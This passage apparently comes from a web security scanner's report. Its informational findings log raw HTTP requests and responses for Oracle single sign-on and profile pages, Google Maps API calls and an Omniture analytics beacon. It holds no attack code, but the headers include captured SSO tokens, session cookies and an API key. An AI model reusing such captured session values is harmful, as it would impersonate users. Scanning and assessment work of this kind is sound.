Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Tue, 22 Apr 2008 09:59:40 GMT
ETag: "97d17-2eb0-480db70c"
Accept-Ranges: bytes
Content-Length: 11952
Connection: close
Content-Type: text/css
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

<STYLE TYPE="text/css">


/* TEXT STYLES */
.betastuff { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; text-decoration: none }

.bodylink {font-family: Arial, H
...[SNIP]...

7.347. https://login.oracle.com/sso_loginui/oralogo_small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /sso_loginui/oralogo_small.gif

Request

GET /sso_loginui/oralogo_small.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Tue, 22 Apr 2008 05:44:53 GMT
ETag: "97d18-80b-480d7b55"
Accept-Ranges: bytes
Content-Length: 2059
Connection: close
Content-Type: image/gif
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

7.348. https://login.oracle.com/sso_loginui/sso_check.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /sso_loginui/sso_check.js

Request

GET /sso_loginui/sso_check.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Fri, 25 Apr 2008 23:56:52 GMT
ETag: "97d50-14f7-48126fc4"
Accept-Ranges: bytes
Content-Length: 5367
Connection: close
Content-Type: application/x-javascript
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

<!--
//global js var
var isNav;

// on load, run this
function doLoad() {
MM_reloadPage(true);
isNav = (navigator.appName.indexOf("Netscape") !=-1);

//register event listeners

...[SNIP]...

7.349. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Request

GET /maps?file=api&v=2.x&key=ABQIAAAAmdg4p1VX3Dj76ATzPBSzuxQc7Lb8KuIcP2E3HOuuHRWXMi158RTnx8ztup2-luunMdHNB0_J9We1VQ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=22bfd9bd84333085:TM=1298912482:LM=1298912482:S=2b0CUVobSsjcAe9b; expires=Wed, 27-Feb-2013 17:01:22 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 28 Feb 2011 17:01:22 GMT
Server: mfe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Mon, 28 Feb 2011 17:01:22 GMT
Content-Length: 11815

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

7.350. http://maps.google.com/maps/gen_204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/gen_204

Request

GET /maps/gen_204?imp=maps_api_set_default_ui HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 204 No Content
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a734d77bc31ce470:TM=1298912486:LM=1298912486:S=ouasXP5Gm8RawMOo; expires=Wed, 27-Feb-2013 17:01:26 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 28 Feb 2011 17:01:26 GMT
Server: mfe
Content-Length: 0
X-XSS-Protection: 1; mode=block


7.351. http://maps.google.com/maps/nav  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/nav

Request

GET /maps/nav?key=ABQIAAAAmdg4p1VX3Dj76ATzPBSzuxQc7Lb8KuIcP2E3HOuuHRWXMi158RTnx8ztup2-luunMdHNB0_J9We1VQ&output=js&doflg=ptj&dirflg=d&mapclient=jsapi&q=from%3A%20%20to%3A%20&callback=_xdc_._5gkpmzhvn HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Feb 2011 17:01:27 GMT
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=71616ce0d0a5eb5b:TM=1298912487:LM=1298912487:S=jVM-Ft8zcWLZiNTF; expires=Wed, 27-Feb-2013 17:01:27 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 28 Feb 2011 17:01:27 GMT
Server: mfe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Mon, 28 Feb 2011 17:01:27 GMT
Content-Length: 104

_xdc_._5gkpmzhvn && _xdc_._5gkpmzhvn({"name":"from: to:","Status":{"code":400,"request":"directions"}})

7.352. http://maps.google.com/maps/vp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Request

GET /maps/vp?spn=1.577927,1.702881&z=8&key=ABQIAAAAmdg4p1VX3Dj76ATzPBSzuxQc7Lb8KuIcP2E3HOuuHRWXMi158RTnx8ztup2-luunMdHNB0_J9We1VQ&mapclient=jsapi&vp=44.0997,-72.744 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:01:26 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=13bcc1aaa6d97912:TM=1298912486:LM=1298912486:S=fRZ9tC89eWm9Y7gK; expires=Wed, 27-Feb-2013 17:01:26 GMT; path=/; domain=.google.com
Set-Cookie: NID=44=dPq9kx1VsxNj2X3CMOkzN8qLdDcAv2WMUz8vEfApUVZ9SqjmNKOw_mvyMQTXd56n9d3jvUFcQIrp6hKn6wbcNIz5a2MUTKBXVjs8Kh6WnHfxT4kNeHLhZVq3eyO8XLF0; expires=Tue, 30-Aug-2011 17:01:26 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 6744

GAddCopyright("m","1874042728106480253",43.3107,-73.5954,44.8887,-71.8926,8,"Google",19,false);
window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:46316584,w:-75585938,n:46558860,e:-74531250,i
...[SNIP]...

7.353. https://mix.oracle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mix.oracle.com
Path:   /

Request

GET / HTTP/1.1
Host: mix.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Feb 2011 23:29:21 GMT
Cache-Control: no-cache
Location: http://mix.oracle.com/home
X-Runtime: 1
Content-Type: text/html;charset=utf-8
Content-Length: 92
Set-Cookie: _mix.oracle=BAh7BjoPc2Vzc2lvbl9pZCIlZDRhOTg4OWNlNmRjNmMwY2RjOTkxM2NiMjAxZWU3ZGY%3D--b1ca44791b7cf01f858b4ab5ff49dc3ee6473e5a; path=/; HttpOnly
Connection: close
Set-Cookie: BIGipServermix-new_oracle_com_http=3290993293.7975.0000; expires=Sun, 27-Feb-2011 07:29:21 GMT; path=/

<html><body>You are being <a href="http://mix.oracle.com/home">redirected</a>.</body></html>

7.354. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/faces/profile/createUser.jspx

Request

GET /EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: http://landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8810727&src=6804803&Act=24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: JSESSIONID=wV5TNpMQRFZ414LTg1285Xs447nvYWhb5rCyPRTzTmLll3QvwQ1v!957286243!-1013772183; path=/; secure; HttpOnly
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=167047533085868664,1)
Set-Cookie: BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000; path=/
Content-Length: 39228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html dir="ltr" lang="en"><head id="d1__xc_h"><title>Create User</title><meta name="generator" con
...[SNIP]...

7.355. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s14008630060125  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://networksolutions.112.2o7.net
Path:   /b/ss/netsolglobal/1/H.21.1/s14008630060125

Request

GET /b/ss/netsolglobal/1/H.21.1/s14008630060125?AQB=1&ndh=1&t=27%2F1%2F2011%2010%3A31%3A15%200%20360&ce=UTF-8&ns=networksolutions&pageName=net%7C%20domain-name-registration%3ERV8.jsp&g=http%3A%2F%2Fwww.networksolutions.com%2Fdomain-name-registration%2FRV8.jsp%3Fsiteid%3D8%26channelid%3DP13C8S570N0B9A1D661E0000V104%26promo%3DRV699SALE3%26referID%3Dns_google_domains_tp%26k%3Ddomain()%7BPhone-RV%7D%26adid%3D5954407096%26plid%3D%26gclid%3DCLqQ3K_hqKcCFc9w5QodUFfOCg%26clickid%3D1294340992&cc=USD&ch=net.retail&v0=P13C8S570N0B9A1D661E0000V104&c1=%2Fdomain-name-registration%2FRV8.jsp&v1=p13c8s570n0b9a1d661e0000v104&v3=%2Fdomain-name-registration%2FRV8.jsp%3ARV8-a.jsp%3A0&c4=%2Fdomain-name-registration&c5=7f54a2c886d230536bf4e8264959&c7=%2Fdomain-name-registration%2FRV8.jsp%3ARV8-a.jsp%3A0&c8=P13C8S570N0B9A1D661E0000V104%3Anet%7C%20domain-name-registration%3ERV8.jsp&v8=new&c13=new%20%7C%20%2Fdomain-name-registration%2FRV8.jsp&c17=S&v17=7f54a2c886d230536bf4e8264959&c18=8%20%7C%20%2Fdomain-name-registration%2FRV8.jsp&c23=Paid%20Search%20%7C%20%2Fdomain-name-registration%2FRV8.jsp&v23=Paid%20Search%20%7C%20%2Fdomain-name-registration%2FRV8.jsp&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: networksolutions.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 27 Feb 2011 16:31:16 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26B53E2A051635AF-400001A3E000109D[CE]; Expires=Fri, 26 Feb 2016 16:31:16 GMT; Domain=networksolutions.112.2o7.net; Path=/
Location: http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s14008630060125?AQB=1&pccr=true&vidn=26B53E2A051635AF-400001A3E000109D&&ndh=1&t=27%2F1%2F2011%2010%3A31%3A15%200%20360&ce=UTF-8&ns=networksolutions&pageName=net%7C%20domain-name-registration%3ERV8.jsp&g=http%3A%2F%2Fwww.networksolutions.com%2Fdomain-name-registration%2FRV8.jsp%3Fsiteid%3D8%26channelid%3DP13C8S570N0B9A1D661E0000V104%26promo%3DRV699SALE3%26referID%3Dns_google_domains_tp%26k%3Ddomain()%7BPhone-RV%7D%26adid%3D5954407096%26plid%3D%26gclid%3DCLqQ3K_hqKcCFc9w5QodUFfOCg%26clickid%3D1294340992&cc=USD&ch=net.retail&v0=P13C8S570N0B9A1D661E0000V104&c1=%2Fdomain-name-registration%2FRV8.jsp&v1=p13c8s570n0b9a1d661e0000v104&v3=%2Fdomain-name-registration%2FRV8.jsp%3ARV8-a.jsp%3A0&c4=%2Fdomain-name-registration&c5=7f54a2c886d230536bf4e8264959&c7=%2Fdomain-name-registration%2FRV8.jsp%3ARV8-a.jsp%3A0&c8=P13C8S570N0B9A1D661E0000V104%3Anet%7C%20domain-name-registration%3ERV8.jsp&v8=new&c13=new%20%7C%20%2Fdomain-name-registration%2FRV8.jsp&c17=S&v17=7f54a2c886d230536bf4e8264959&c18=8%20%7C%20%2Fdomain-name-registration%2FRV8.jsp&c23=Paid%20Search%20%7C%20%2Fdomain-name-registration%2FRV8.jsp&v23=Paid%20Search%20%7C%20%2Fdomain-name-registration%2FRV8.jsp&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3